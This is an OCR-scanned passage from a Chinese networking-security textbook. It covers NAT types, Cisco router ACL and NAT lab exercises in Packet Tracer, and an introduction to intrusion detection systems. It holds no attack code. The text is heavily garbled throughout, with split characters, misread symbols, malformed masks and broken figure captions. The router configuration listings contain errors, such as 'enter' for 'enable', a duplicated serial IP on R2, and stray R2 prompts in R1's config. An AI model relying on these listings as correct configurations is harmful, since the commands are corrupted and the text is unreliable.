IP 地 址 主机 的 连接 ,但 内 部 私有 IP 地 址 主机 可 以 发 起 与 公 网 的 连接 ,NAT 技术 对 内 部 网 
络 起 到 了 隐藏 保护 的 作用 ,从 而 降低 了 内 部 网 络 受到 攻击 的 风险 。 


2. NAT 类 型 


NAT 多 应 用 于 针对 RFC 1918 规定 的 私有 TP 地 址 范围 (A 类 10. 0. 0. 0 一 10. 255. 255. 255、 
B 172. 16. 0. 0 一 172. 31. 255. 255 MI C 类 192. 168. 0. 0 一 192. 168. 255. 255) 。 根 据 实 际 
使 用 的 环境 与 需求 ,NAT 主要 有 如 下 3 种 类 型 的 应 用 。 

(1) 一 对 一 的 静态 NAT 转换 : Static Mode(One to One Mapping) 。 内 部 私有 地 址 与 
给 定 的 公有 地 址 进行 一 对 一 的 映射 转换 ,并 且 为 双向 转换 。 这 种 类 型 的 NAT 可 应 用 于 
防火 墙 DMZ 接口 或 路 由 器 内 部 的 服务 器 区 中 的 对 外 提供 服务 的 服务 器 ,如 Web, DNS, 
FTP 等 。 例 如 Web 服务 器 内 部 的 私有 IP 地址 192. 168. 41. 3 一 对 一 的 静态 NAT 转换 为 
202. 108. 5.35 等 。 

(2) 多 对 多 的 动态 NAT 地 址 池 转 换 : Dynamic Mode(IP Pool Mapping) 。 在 企业 网 络 
接 人 互联 网 中 ,一 般 都 可 以 从 ISP 获取 一 个 连续 的 公 网 IP 地 址 段 。 比 如 200. 1. 1. 0/29 ,其 中 
可 用 的 主机 公 网 IP 地 址 为 200. 1. 1. 1 一 200. 1. 1. 6 ,一 个 为 ISP 的 网 关 地 址 (如 200. 1. 1. 1) ,一 
个 为 配置 给 企业 路 由 器 或 防火 墙 的 外 网 接口 的 TP 地址 (如 200. 1. 1. 2) ,其 余 公 网 IP 可 用 
于 地 址 池 200. 1. 1. 3 一 200. 1. 1.6, 可 以 用 于 对 内 部 的 多 台 主 机 进行 多 对 多 的 转换 。 如 192. 
168. 1. 1—192. 168. 1. 10 对 应 转换 为 地 址 池 200. 1. 1. 3 一 200. 1. 1. 6 中 的 IP 地 址 。 

(3) 基于 端口 的 越 载 或 重 载 的 NAT 转换 : Port NAT Mode(Many to One Mapping) . 
也 称 为 PAT。 这 种 方式 下 多 个 私有 地 址 对 应 公 网 中 的 一 个 IP 地 址 。 多 个 内 部 私有 地 址 变 
换 为 统一 的 外 部 公有 地 址 ,为 了 同时 通信 ,对 公有 地 址 动态 配置 不 同 的 端口 号 与 多 个 内 部 私 
有 地 址 进行 映射 。 这 种 应 用 在 公有 TP 数 少时 使 用 (1 个 公 网 IP 地 址 可 以 对 应 65536 一 1024 
个 连接 可 能 性 ) ,这 也 是 在 防火 墙 和 路 由 器 上 应 用 最 多 的 NAT 类 型 ,也 称 为 PAT。 例 如 映 
射 192. 168. 1. 1 一 192. 168. 1. 254 对 应 200. 1. 1. 1:1024~ 65535 的 PAT 转换 。 


3. NAT 应 用 举例 


NAT 功能 通常 被 集成 到 路 由 器 .防火墙 .ISDN 路 由 器 或 者 单独 的 NAT 设备 中 ,也 
可 以 通过 软件 实现 这 一 功能 ,多 数 操作 系统 (Windows、Linux 等 ) 都 包含 这 一 功能 。 如 
图 11-15 所 示 为 在 路 由 器 上 配置 地 址 池 与 PAT 的 结合 ,路 由 器 上 NAT 转换 配置 步骤 
如 下 。 


实践 


(D (全 局 上 ) access-list 访问 号 1 (permit | deny) 反 掩 码 号 [ established] 
© access-list 访问 号 (permit | deny) IP/TCP 协议 源 网 络 目的 网 

(3) ip nat pool ceyl 200. 1. 1. 1 200. 1. 1. 62 netmask 255. 255. 255. 192 

(4) e0 ip nat inside 

(S) s0 ip nat outside 

© access-list 1 permit 192. 168. 1. 0 0. 0. 0. 255 


(D ip nat inside source list 1 pool ceyl overload 


200.1.1.87—89 200.1.1.88 i 


200.1.1.86 192.168.1.1 


Web Server 


192.168.1.0 


图 11-15 配置 址 地 池 与 PAT 的 结合 


设计 路 由 器 包 过 滤 技 术 


在 路 由 器 中 配置 访问 控制 列表 ,实现 简单 的 包 过 滤 技 术 , 可 以 利用 PacketTracer5 软件 
完成 配置 任务 。 

【要 求 】 

A 可 以 访问 外 部 网 络 ,但 是 只 有 B 不 能 访问 外 部 网 络 ; 外 部 网 络 (C 和 D 主机 所 处 的 网 络 
以 外 的 网 络 及 主机 ) 中 只 有 B 可 以 Telnet 远程 登录 到 C 和 D 主机 及 其 网 络 , 如 图 11-16 所 示 。 


IP 地 址 信息 : 

R1-S0JP: 10.1.1.1 R2-S0-IP: 10.1.1.2 

R1-E0JP: 172.16.1.254 — R2-E0-IP: 192.168.1.254 
A-IP: 172.16.1.1 C-IP: 192.168.1.1 
B-P: 172.16.1.2 D-IP: 192.168.1.2 


A 与 B 网 关 : 172.16.1.254 CSD: 192.168.1.254 
图 11-16 配置 路 由 器 包 过 滤 


配置 过 程 参考 如 下 。 
O RI 配置 ,命令 如 下 : 


Router > enter 


Router # configure terminal 

Router(config) # hostname R1 

Rl(config)£ interface ethernet 0 

Rl(config- if) # ip address 172.16.1.254 255.255.255.0 
R2(config- if) # no shutdown 

Rl(config- if) # exit 

Ri(config)£ interface serial 0 

Rl(config- if) # ip address 10.1.1.1 255.255.255.0 
Rl(config- if) # clock rate 64000 

Rl(config- if) # no shutdown 

Rl(config- if) # exit 

Rl(config)£ router ospf 1 

Rl(config- router) # network 172.16.1.0 0.0.0.255 area 0 
Rl(config- router) # network 10.1.1.0 0.0.0.255 area 0 
Ri(config- router) # exit 

Rl(config)£ access - list 88 deny host 172.16.1.2 
Rl(config) # access - list 88 permit any 

Rl(config)£ interface e0 

Ri(config- if)# ip access- group 88 in 

Ri(config)£ exit 

RIẸ write 


Q R2 配置 ,命令 如 下 。 


Router > enter 

Router# configure terminal 

Router(config)# hostname R2 

R2(config)t interface ethernet 0 

R2(config- if) ip address 192.168.1.254 255.255.255.0 
R2(config- if) # no shutdown 

R2(config- if) & exit 

R2(config) # interface serial 0 

R2(config- if) & ip address 10.1.1.1 255.255.255.0 
R2(config- if) # no shutdown 

R2(config- if) & exit 

R2(config) # router ospf 1 

R2(config- router) # network 192.168.1.0 0.0.0.255 area 0 
R2(config- router) # network 10.1.1.0 0.0.0.255 area 0 
R2(config- router) # exit 


R2(config) # access - list 101 permit tcp host 172.16.1.2 192.168.1.0 0.0.0.255 eq telnet 
R2(config)£ interface e0 

R2(config- if) # ip access- group 101 out 

R2(config) # exit 

R2£ write 


设计 企业 网 络 中 的 路 由 器 ACLT- NAT 


在 企业 的 实际 环境 中 完成 如 下 两 个 工作 任务 中 的 一 个 。 
利用 PacketTracer5 软件 搭建 如 图 11-17 所 示 的 网 络 硬件 环境 。 要 求 按 图 示 完 成 如 下 
任务 。 


F2/0:200.1.1.1/29 


F0/0:192.168.1.1 


部 网 络 网 路 
IP 地 址 : 200.1.1.2/29 


E 机 本 路 内 部 主机 网 路 
IP 地 址 : 192.168.1.0/24 _IP+#ühk: 192.168.2.100/24 


图 11-17 网 络 环境 实例 


CD 利用 PacketTracer5 画图 并 连 线 。 

(2) 配置 各 主机 和 设备 的 IP 地 址 , Web 服务 器 开启 HTTP 服务 。 

(3) 配置 路 由 器 各 接口 地 址 、 默 认 路 由 、 通 过 ACL 十 NAT 的 配置 使 得 A、B 和 C 主机 可 
以 NAT 后 访问 外 网 主机 D, A,B A C 可 利用 内 网 地 址 192. 168. 2. 100 去 访问 Web 服务 
器 ,外 部 主机 D 也 可 以 访问 Web 服务 器 但 是 通过 公 网 地 址 访问 。 

(4) 配置 ACL 功能 , 仅 不 允许 主机 也 与 主机 D 进行 ICMP 通信 。 

CD 添加 路 由 器 。 

PacketTracer5 软件 的 安装 这 里 不 再 介绍 ,安装 完成 后 利用 其 按 实际 的 图 示 进 行 网 络 结 
构 设 计 , 增 加 路 由 器 ,由 于 后 面 的 图 中 都 采用 的 是 以 太 网 连接 ,路 由 器 接 以 太 网 接口 不 够 ,所 
以 移 除 2 个 串口 后 又 增加 了 2 个 快速 以 太 网 接口 。 具 体操 作为 单 击 图 中 1 处 的 电源 开关 ， 
关闭 电源 ,选择 图 中 左 侧 2 处 的 模块 中 的 1CFE, 再 托 动 图 中 3 处 的 图 标 到 路 由 器 图 中 的 空 
插 槽 处 即 可 ,都 添加 完成 后 再 单 击 1 处 开启 路 由 器 电源 。 在 CLI 选 项 卡 下 可 进行 路 由 器 的 
命令 行 配置 ,如 图 11-18 所 示 。 
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图 11-18 添加 路 由 器 


利用 PacketTracer5 软件 画 完 网 络 拓扑 图 ,如 图 11-19 所 示 。 需 要 注意 的 是 ,图 中 所 示 
红色 的 连 线 说 明 可 能 是 物理 没有 连通 ,经 检查 发 现 使 用 了 直通 线 (Copper Straight- 
Through) ,这 里 要 选择 交叉 铜 线 (Copper Cross-Over) 。 
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图 11-19 绘制 完整 的 拓扑 图 


© 配置 各 主机 和 设备 的 IP 地址 ,Web 服务 器 开启 HTTP 服务 。 

以 图 11-20 对 Web 服务 器 的 配置 为 例 配置 各 主机 对 应 的 IP 及 网 关 地 址 。A、B、C 对 应 
IP 为 192. 168. 1. 2 — 192. 168. 1.4, 掩 码 都 是 255. 255. 255. 0, 网 关 都 是 192. 168. 1. 1; 
D 主机 模拟 公 网 上 的 主机 ,IP 地 址 为 200. 1. 1.2, 掩 码 为 29 位 , 即 255. 255. 255. 255. 248 ,为 
了 检查 到 NAT 的 效果 不 要 配置 网 关 。 单 击 图 中 的 主机 ,选择 Desktop 可 以 对 主机 配置 IP 
地 址 网 关 等 信息 。 路 由 器 外 网 接口 F2/0 的 IP 地 址 为 200. 1. 1. 1, 掩 码 也 是 29 位 ,此 子 网 
内 的 主机 TP 地 址 为 200. 1. 1. 1 一 200.1.1.6。 


图 11-20 配置 IP 及 网 关 地址 


© 路 由 器 包 过 滤 及 NAT 的 配置 。 

配置 路 由 器 各 接口 地 址 .默认 路 由 .通过 ACL 十 NAT 的 配置 使 得 A,B,C 主机 可 以 
NAT 后 访问 外 网 主机 D, 并 可 利用 内 网 地 址 192. 168. 2. 100 地 址 去 访问 Web 服务 器 ( 公 网 
使 用 200. 1. 1. 3 的 IP 地 址 ), 外 部 主机 D 可 以 访问 Web 服务 器 。 

对 路 由 器 的 配置 使 用 show run 命令 进行 查看 ,部 分 关键 配置 如 下 ,可 用 于 配置 的 实施 
参考 。 


r1 # show run 
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semacemr (E) 


hostname r1 
interface FastEthernet0/0 

ip address 192.168.1.1 255.255.255.0 

ip access - group 110 in //# 110 列表 的 规则 数据 包 进 行 F0/0 时 进行 相应 的 访问 控制 
ip nat inside // 接 口 Fo/0 为 NAT 地 址 转换 的 内 部 地 址 
interface FastEthernetl/0 

ip address 192.168.2.1 255.255.255.0 

ip nat inside //3 1 F1/0 为 NAT 地 址 转换 的 内 部 地 址 
interface FastEthernet2/0 

ip address 200.1.1.1 255.255.255.248 

ip nat outside // 8&1 F2/0 为 NAT 地 址 转换 的 外 部 地 址 
ip nat inside source list 10 interface FastEthernet2/0 overload 


// 对 于 列表 10 中 定义 的 源 地址 进行 动态 超载 NAT(PAT) 转 换 ,并 都 转换 为 F2/0 接口 的 公 网 地 址 


ip nat inside source static 192.168.2.100 200.1.1.3 // 定 义 Web 服务 器 的 静态 转换 
access - list 10 permit 192.168.1.0 0.0.0.255 // 定 义 NAT 的 源 地 址 

access - list 10 permit 192.168.2.0 0.0.0.255 // 定 义 NAT 的 源 地 址 

access- list 110 deny icmp host 192.168.1.3 host 200.1.1.2  //A&|E 3: BL B 5j 3E EL D 进行 ICMP 通信 
access - list 110 permit ip any any // 人 允许 B 主机 以 外 的 主机 进行 IP 通信 
rl# 


@ 对 NAT 转换 检查 与 测试 。 
在 主机 A 上 ping 主机 D, 正 常 为 连通 状态 ,但 主机 D 无 法 ping 通 主机 ACNAT 屏蔽 了 
内 部 主机 ) 。 检 查 结果 如 图 11-21 所 示 ,说 明 NAT 动态 转换 设置 正确 。 


图 11-21 检查 结果 


© 对 Web 服务 器 访问 检查 与 测试 。 

分 别 在 A 主机 和 D 主机 上 访问 Web 服务 器 ,A 访问 Web 服务 器 的 内 网 IP 地 址 为 
192. 168. 2. 100 ,而 D 主机 Web 服务 器 的 外 网 NA T 静态 转换 后 的 IP 地 址 为 200. 1. 1. 3 ,如 
图 11-22 所 示 ,说 明 对 Web 服务 器 的 一 对 一 静态 NAT 转换 配置 正确 。 

© 对 包 过 滤 ACL 功能 检查 与 测试 。 

分 别 在 主机 B 和 主机 C 上 ping 主机 D, 检 查 连 通 性 ,配置 正确 后 ,B 应 该 无 法 与 D 进行 
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基于 ICMP 协议 的 通信 ,而 A C 和 路 由 器 接口 的 TP 都 可 以 与 D 进行 基于 ICMP 协议 的 通 
信 , 如 图 11-23 所 示 。 


Physical | Config | Desktop 


Web Browser 四 
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11-22 NAT 转换 配置 正确 


ived = O, Lose = 4 (1001 less), 


图 11-23 连通 性 检查 结果 
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虽然 防火 墙 及 强大 的 身份 验证 能 够 保护 系统 不 受 未 经 授权 访问 的 
侵扰 ,但 是 它们 对 专业 黑客 或 恶意 的 经 授权 用 户 却 无 能 为 力 。 企 业经 常 
在 防火 墙 系统 上 投入 大 量 的 资金 ,在 Internet 入 口 处 部 署 防火 墙 系统 来 
保证 安全 ,依赖 防火 墙 建立 网 络 的 组 织 往往 是 “外 紧 内 松 ”, 无 法 阻止 内 
部 人 员 所 做 的 攻击 ,对 信息 流 的 控制 缺乏 灵活 性 ,从 外 面 看 似 于 非常 安 
全 ,但 内 部 缺乏 必要 的 安全 措施 。 据 统计 ,全 球 80% 以 上 的 入 侵 来 自 于 
内 部 。 由 于 性 能 的 限制 ,防火 墙 通常 不 能 提供 实时 的 入 侵 检测 能 力 , 对 
于 企业 内 部 人 员 所 做 的 攻击 ,防火 墙 形同虚设 。 

入 侵 检 测 是 对 防火 墙 极其 有 益 的 补充 ,入 侵 检测 系统 能 使 在 入侵 攻 
击 对 系统 发 生 危害 前 检测 到 入 侵 攻 击 ,并 利用 报警 与 防护 系统 驱逐 入 侵 
攻击 。 在 入 侵 攻击 过 程 中 ,能 减少 入 侵 攻 击 所 造成 的 损失 。 在 被 入 侵 攻 
击 后 ,收集 入 侵 攻 击 的 相关 信息 ,作为 防范 系统 的 知识 ,添加 入 知识 库 
内 ,增强 系统 的 防范 能 力 ,避免 系统 再 次 受到 入 侵 。 入 侵 检 测 被 认为 是 
防火 墙 之 后 的 第 二 道 安 全 闸门 ,在 不 影响 网 络 性 能 的 情况 下 能 对 网 络 进 
行 监听 ,从 而 提供 对 内 部 攻击 、 外 部 攻击 和 误 操作 的 实时 保护 ,大 大 提高 
了 网 络 的 安全 性 。 


12.1 人 侵 检 测 的 概念 


入 侵 检 测 (Intrusion Detection ,ID) 是 对 入 侵 行为 的 检测 。 它 通过 收 
集 和 分 析 计 算 机 网 络 或 计算 机 系统 中 若干 关键 点 的 信息 ,检查 网 络 或 系 
统 中 是 否 存在 违反 安全 策略 的 行为 和 被 攻击 的 迹象 。 进 行人 侵 检测 的 软 
件 与 硬件 的 组 合 便 是 入 侵 检测 系统 (Intrusion Detection System. IDS) 。 

入 侵 检 测 的 研究 最 早 可 以 追溯 到 詹姆斯 . 安德森 (James P. 
Anderson) fE 1980 年 为 美国 空军 做 的 题 为 (计算 机 安全 威胁 监控 与 监 
dL) Computer Security Threat Monitoring and Surveillance) 的 技术 报 
告 , 第 一 次 详细 阐述 了 入 侵 检测 的 概念 。 他 提出 了 一 种 对 计算 机 系统 风 
险 和 威胁 的 分 类 方法 ,并 将 威胁 分 为 外 部 渗透 .内 部 渗透 和 不 法 行为 3 
种 ,还 提出 了 利用 审计 跟踪 数据 监视 入 侵 活动 的 思想 。 他 的 理论 成 为 人 
侵 检测 系统 设计 及 开发 的 基础 。 

1984 到 1986 年 ,乔治 敦 大 学 的 Dorothy Denning 和 Peter Neumann 
合作 研究 并 开发 出 一 个 实时 入 侵 检测 系统 模型 , 称 为 人 侵 检测 专家 系统 


(IDES) ,Dorothy Denning 于 1987 年 出 版 了 论文 An Intrusion Detection Model ,首先 对 人 
侵 检测 系统 模式 做 出 定义 : 一 般 而 言 , 入 侵 检测 通过 网 络 封包 或 信息 收集 检测 可 能 的 人 侵 
行为 ,并 且 能 在 入侵 行为 造成 危害 前 及 时 发 出 报警 通知 系统 管理 员 ,并 进行 相关 的 处 理 措 
施 。 该 文 为 其 他 研究 者 提供 了 包含 信息 来 源 、 分 析 引 擎 和 响应 3 个 必要 功能 组 件 的 通用 方 
法 框架 。1990 年 加 州 大 学 戴 维 斯 分 校 的 L. T. Heberlein 等 人 提出 并 开发 了 基于 网 络 的 入 
侵 检 测 系 统一 一 网 络 系统 监控 器 (Network Security Monitor. NSM)。 该 系统 第 一 次 直接 
监控 以 太 网 段 上 的 网 络 数据 流 , 并 把 它 作 为 分 析 审 计 的 主要 数据 源 。 从 20 世纪 90 年 代 到 
现在 ,对 入 侵 检 测 系 统 的 研发 工作 已 呈现 出 百家争鸣 的 繁荣 局 面 。 目 前 ,加 州 大 学 戴 维 斯 分 
校 . 哥 伦比 亚 大 学 .新 墨西哥 大 学 . 普 渡 大 学 斯坦福 国 际 研究 所 (SRI) 等 机 构 在 该 领域 研究 
的 代表 了 当前 的 最 高 水 平 。 

入 侵 检 测 性 能 关键 参数 包括 误 报 与 漏 报 。 误 报 (false positive) 是 指 系统 错误 地 将 异常 
活动 定义 为 人 侵 。 漏 报 (false negative) 是 系统 未 能 检测 出 真正 的 入 侵 行为 。 


12.2 人 侵 检测 系统 的 分 类 


依照 信息 来 源 收集 方式 的 不 同 , 入 侵 检 测 系统 可 以 分 为 主机 型 (Host-Based IDS) 和 网 
络 型 (Network-Based IDS); 另外 , 按 其 分 析 方法 可 分 为 异常 检测 (Anomaly Detection, AD) 
和 误 用 检测 (Misuse Detection. MD) ,其 分 类 架构 如 图 12-1 所 示 。 


入 侵 检测 系统 (IDS) 


| 主机 型 (Host-based) 网 络 型 (Network-based) 


[. Fuse (aD) 说 月 检测 《MD) 


图 12-1 入 侵 检 测 系统 分 类 架构 图 


12.2.1 主机 型 入 侵 检 测 系统 


主机 型 人 侵 检测 系统 (Host-based Intrusion Detection System, HIDS) 是 早期 的 入 侵 检 
测 系统 结构 , 其 检测 的 目标 主要 是 主机 系统 和 系统 本 地 用 户 , 检测 原理 是 根据 主机 的 审计 
数据 和 系统 日 志 发 现 可 疑 事件 。 检 测 系统 可 以 运行 在 被 检测 的 主机 或 单独 的 主机 上 , 系统 
结构 如 图 12-2 所 示 。 
。 优点 : 确定 攻击 是 否 成 功 ; 监测 特定 主机 系统 活动 ; 较 适 合 有 加 密 和 网 络 交换 器 的 
环境 ; 不 需要 另外 添加 设备 。 
° 缺点 : 可 能 因 操作 系统 平台 提供 的 日 志 信 息 格 式 不 同 ,必须 针对 不 同 的 操作 系统 安 
装 个 别 的 入侵 检测 系统 ; 如 果 入 侵 者 经 其 他 系统 漏洞 入 侵 系 统 , 并 取得 管理 者 的 权 
限 , 那 将 导致 主机 型 人 侵 检测 系统 失去 效用 ; 可 能 会 因 分 布 式 (Denail of Service. 
DoS) 攻 击 而 失去 作用 ; 当 监 控 分 析 时 可 能 会 增加 该 台 主机 的 系统 资源 负荷 ,影响 被 
监测 主机 的 效能 ,甚至 成 为 入侵 者 利用 的 工具 ,使 被 监测 的 主机 负荷 过 重 而 死机 。 


实践 


图 12-2 主机 型 IDS 结构 


12.2.2 网 络 型 入 侵 检测 系统 


网 络 型 入 侵 检测 系统 (Network-based Intrusion Detection System,NIDS) 是 通过 分 析 
主机 之 间 网 线 上 传输 的 信息 来 工作 的 。 它 通常 利用 一 个 工作 在 “混杂 模式 ”(Promiscuous 
Mode) 下 的 网 卡 来 实时 监视 并 分 析 通 过 网 络 的 数据 流 。 它 的 分 析 模 块 通常 使 用 模式 匹配 、 
统计 分 析 等 技术 来 识别 攻击 行为 。 其 结构 如 图 12-3 所 示 。 
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图 12-3 网络 型 入 侵 检测 系统 模型 


探测 器 的 功能 是 按 一 定 的 规则 从 网 络 上 获取 与 安全 事件 相关 的 数据 包 , 然后 传递 给 分 
析 引 擎 进行 安全 分 析 判 断 。 分 析 引 擎 将 从 探测 器 上 接收 到 的 数据 包 结 合 网 络 安全 数据 库 进 
行 分 析 , 把 分 析 的 结果 传递 给 配置 构造 器 。 配 置 构造 器 按 分 析 引 擎 器 的 结果 构造 出 探测 器 
所 需要 的 配置 规则 。 一 旦 检测 到 了 攻击 行为 ,NIDS 的 响应 模块 就 做 出 适当 的 响应 ,比如 报 
警 .切断 相关 用 户 的 网 络 连接 等 。 
不 同人 侵 检 测 系统 在 实现 时 采用 的 响应 方式 也 可 能 不 同 ,但 通常 都 包括 通知 管理 员 UJ 
断 连接 、 记 录 相 关 的 信息 以 提供 必要 的 法 律 依据 等 。 
。 优 点 : 成 本 低 ; 可 以 检测 到 主机 型 检测 系统 检测 不 到 的 攻击 行为 ; 入侵 者 消除 人 侵 
证 据 困难 ; 不 影响 操作 系统 的 性 能 ; 架构 网 络 型 入 侵 检 测 系统 简单 。 
t 缺点 : 如 果 网 络 流速 高 时 可 能 会 丢失 许多 封包 ,容易 让 入 侵 者 有 机 可 乘 ; 无 法 检测 
加 密 的 封包 ; 对 于 直接 对 主机 的 入 侵 无 法 检测 出 。 


12.2.3 混合 型 入 侵 检 测 系统 


主机 型 和 网 络 型 和 人 侵 检测 系统 都 有 各 自 的 优 缺点 ,混合 型 入侵 检测 系统 (Hybrid) 是 基 
于 主机 和 基于 网 络 的 人 侵 检测 系统 的 结合 ,许多 机 构 的 网 络 安全 解决 方案 都 同时 采用 了 基 
于 主机 和 基于 网 络 的 两 种 人 侵 检测 系统 ,因为 这 两 种 系统 在 很 大 程度 上 互补 ,两 种 技术 结合 
能 大 幅度 提升 网 络 和 系统 面 对 攻击 和 错误 使 用 时 的 抵抗 力 , 使 安全 实施 更 加 有 效 。 


12.2.4 误 用 检测 


误 用 检测 (Misuse detection) 又 称 特 征 检测 (Signature-based detection) ,这 一 检测 假设 
入 侵 者 活动 可 以 用 一 种 模式 来 表示 ,系统 的 目标 是 检测 主体 活动 是 否 符合 这 些 模式 。 它 可 
以 将 已 有 的 入 侵 方法 检查 出 来 ,但 对 新 的 入 侵 方 法 无 能 为 力 。 其 难点 在 于 如 何 设计 模式 既 
能 够 表达 “入侵 "现象 又 不 会 将 正常 的 活动 包含 进来 ,如 图 12-4 所 示 。 
更 新 规则 


如 入 新 规则 
A 12-4 误 用 检测 示意 图 


设 定 一 些 入 侵 活动 的 特征 (Signature) ,通过 现在 的 活动 是 否 与 这 些 特征 匹配 来 检测 。 
常用 的 检测 技术 如 下 。 


1. 专家 系统 


采用 一 系列 检测 规则 分 析 入 侵 的 特征 行为 。 所 谓 规 则 , 即 是 知识 ,不 同 的 系统 与 设置 具 
有 不 同 的 规则 , 且 规 则 之 间 往 往 无 通用 性 。 专 家 系统 的 建立 依赖 于 知识 库 的 完备 性 ,知识 库 
的 完备 性 又 取决 于 审计 记录 的 完备 性 与 实时 性 。 入 侵 的 特征 抽取 与 表达 ,是 入 侵 检 测 专 家 
系统 的 关键 。 在 系统 实现 中 ,将 有 关 入 侵 的 知识 转化 为 if-then 结构 (也 可 以 是 复合 结构 )， 
条 件 部 分 为 人 侵 特征 ,then 部 分 是 系统 防范 措施 。 运 用 专家 系统 防范 有 特征 入 侵 行为 的 有 
效 性 完全 取决 于 专家 系统 知识 库 的 完备 性 。 


2. 基于 模型 的 入 侵 检 测 方 法 


入 侵 者 在 攻击 一 个 系统 时 往往 采用 一 定 的 行为 序列 ,如 猜测 口令 的 行为 序列 。 这 种 行 
为 序列 构成 了 具有 一 定 行为 特征 的 模型 ,根据 这 种 模型 所 代表 的 攻击 意图 的 行为 特征 ,可 以 
实时 地 检测 出 恶意 的 攻击 企图 。 基 于 模型 的 入 侵 检 测 方 法 可 以 仅 监测 一 些 主要 的 审计 事 
件 。 当 这 些 事件 发 生 后 ,再 开始 记录 详细 的 审计 ,从 而 减少 审计 事件 处 理 负荷 。 这 种 检测 方 


是 否 符合 规则? 


实践 


法 的 另外 一 个 特点 是 可 以 检测 组 合 攻击 (coordinate attack) 和 多 层 攻 击 (multi-stage attack) 。 
3. 简单 模式 匹配 


模式 匹配 (Pattern Matching) 就 是 将 收集 到 的 信息 与 已 知 的 网 络 入 侵 和 系统 误 用 模式 
数据 库 进 行 比较 ,从 而 发 现 违 背 安 全 策略 的 行为 。 一 种 进攻 模式 可 以 用 一 个 过 程 (如 执行 一 
条 指令 ) 或 一 个 输出 (如 获得 权限 ) 来 表示 。 该 过 程 可 以 很 简单 (如 通过 字符 串 匹 配 以 寻找 一 
个 简单 的 条 目 或 指令 ) ,也 可 以 很 复杂 (如 利用 正规 的 数学 表达 式 来 表示 安全 状态 的 变化 ) 。 
基于 模式 匹配 的 和 人 侵 检 测 方法 将 已 知 的 入 侵 特征 编码 成 为 与 审计 记录 相符 合 的 模式 。 当 新 
的 审计 事件 产生 时 ,这 一 方法 将 寻找 与 它 相 匹配 的 已 知 入 侵 模式 。 


4. 软 计算 方法 
软 计算 方法 包含 了 神经 网 络 .遗传 算法 与 模糊 技术 。 


12.2.5 异常 检测 


异常 检测 (Anomaly Detection) 假 设 入 侵 者 活动 是 异常 于 正常 主体 的 活动 。 根 据 这 一 
理念 建立 主体 正常 活动 的 “活动 简 档 ”, 将 当前 主体 的 活动 状况 与 “活动 简 档 " 相 比较 , 当 违 反 
其 统计 规律 时 ,认为 该 活动 可 能 是 "入侵 ”行为 ,如 图 12-5 所 示 。 异 常 检 测 的 优点 之 一 为 具 

A typical anomaly detection system 有 通过 抽象 的 系统 正常 行为 检测 系统 异常 行为 
update profile 的 能 力 。 这 种 能 力 不 受 系统 以 前 是 否 知道 这 种 


d) 入 侵 的 限制 ,所 以 能 够 检测 新 的 入侵 行为 。 大 多 
State 
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数 正常 行为 的 模型 使 用 一 种 矩阵 的 数学 模型 , 矩 
阵 的 数量 来 自 于 系统 的 各 种 指标 。 比 如 CPU fidi 
generate nest pres dynamically 用 率 、 内 存 使 用 率 、 登 录 的 时 间 和 次 数 、 网 络 活动 
图 12-5 异常 检测 系统 及 文件 的 改动 等 。 异 常 检测 的 缺点 是 , 若 人 侵 者 
了 解 到 检测 规律 ,就 可 以 小 心地 避免 系统 指标 的 
突变 ,而 使 用 逐渐 改变 系统 指标 的 方法 逃避 检测 ;另外 检测 效率 也 不 高 ,检测 时 间 比 较 长 。 
最 重要 的 这 是 一 种 * 事 后 ”的 检测 , 当 检测 到 入 侵 行为 时 ,破坏 早已 经 发 生 了 。 
统计 方法 是 当前 产品 化 的 入 侵 检测 系统 中 常用 的 方法 , 它 是 一 种 成 熟 的 入侵 检测 方法 ， 
它 使 和 侵 检测 系统 能 够 学 习 主体 的 日 常 行为 ,将 那些 与 正常 活动 之 间 存在 较 大 统计 偏差 的 
活动 标识 为 异常 活动 。 统 计 分 析 方法 首先 给 系统 对 象 (如 用 户 ,文件 .目录 和 设备 等 ) 创 建 一 
个 统计 描述 ,统计 正常 使 用 时 的 一 些 测量 属性 (如 访问 次 数 、 操 作 失 败 次 数 和 延 时 等 ) ,测量 
属性 的 平均 值 ,用 来 与 网 络 、 系 统 的 行为 进行 比较 ,任何 观察 值 在 正常 值 范围 之 外 时 ,就 认为 
HARRE. 
常用 的 入侵 检测 统计 模型 如 下 所 述 。 
CD 操作 模型 ,该 模型 假设 异常 可 通过 测量 结果 与 一 些 固定 指标 相 比 较 得 到 ,固定 指标 
可 以 根据 经 验 值 或 一 段 时 间 内 的 统计 平均 得 到 。 举 例 来 说 ,在 短 时 间 内 的 多 次 失败 的 登录 
很 有 可 能 是 口令 尝试 攻击 。 
D 方差 ,计算 参数 的 方差 , 设 定 其 置信 区 间 , 当 测量 值 超过 置信 区 间 的 范围 时 ,表明 有 


deviant? 


可 能 是 异常 。 

(3) 多 元 模型 ,操作 模型 的 扩展 ,通过 同时 分 析 多 个 参数 实现 检测 。 

(4) 马尔 可 夫 过 程 模型 ,将 每 种 类 型 的 事件 定义 为 系统 状态 ,用 状态 转移 矩阵 来 表示 状 
态 的 变化 , 当 一 个 事件 发 生 时 ,或 状态 矩阵 该 转移 的 概率 较 小 , 则 可 能 是 异常 事件 。 

(5) 时 间 序 列 分 析 ,将 事件 计数 与 资源 耗 用 根据 时 间 排 成 序列 ,如 果 一 个 新 事件 在 该 时 
间 发 生 的 概率 较 低 , 则 该 事件 可 能 是 入侵 。 

统计 方法 的 最 大 优点 是 它 可 以 “学 习 ” 用 户 的 使 用 习惯 ,从 而 具有 较 高 检 出 率 与 可 用 性 。 
但 是 它 的 “学 习 ” 能 力也 给 入 侵 者 以 机 会 通过 逐步 “训练 "使 入 侵 事 件 符合 正常 操作 的 统计 规 
律 ,从 而 通过 入 侵 检测 系统 。 


12.3 入 侵 检测 技术 的 发 展 方向 


1. 入 侵 技 术 的 发 展 与 演化 


无 论 从 规模 还 是 方法 上 ,入 侵 检 测 技 术 近 年 来 都 发 生 了 变化 。 入 侵 的 手段 与 技术 也 有 
了 “进步 与 发 展 "。 入 侵 技术 的 发 展 与 演化 主要 反映 在 下 列 几 个 方面 。 

(1) 入 侵 或 攻击 的 综合 化 与 复杂 化 。 入 侵 者 在 实施 入 侵 或 攻击 时 往往 同时 采取 多 种 入 
侵 的 手段 ,以 保证 入 侵 的 成 功 几 率 , 并 可 在 攻击 实施 的 初期 掩盖 攻击 或 人 侵 的 真实 目的 。 

(2) 入 侵 主体 对 象 的 间接 化 。 通 过 一 定 的 技术 ,可 以 掩盖 攻击 主体 的 源 地 址 及 主机 位 
置 。 即 使 用 了 隐蔽 技术 后 ,对 于 被 攻击 对 象 攻 击 的 主体 是 无 法 直接 确定 的 。 

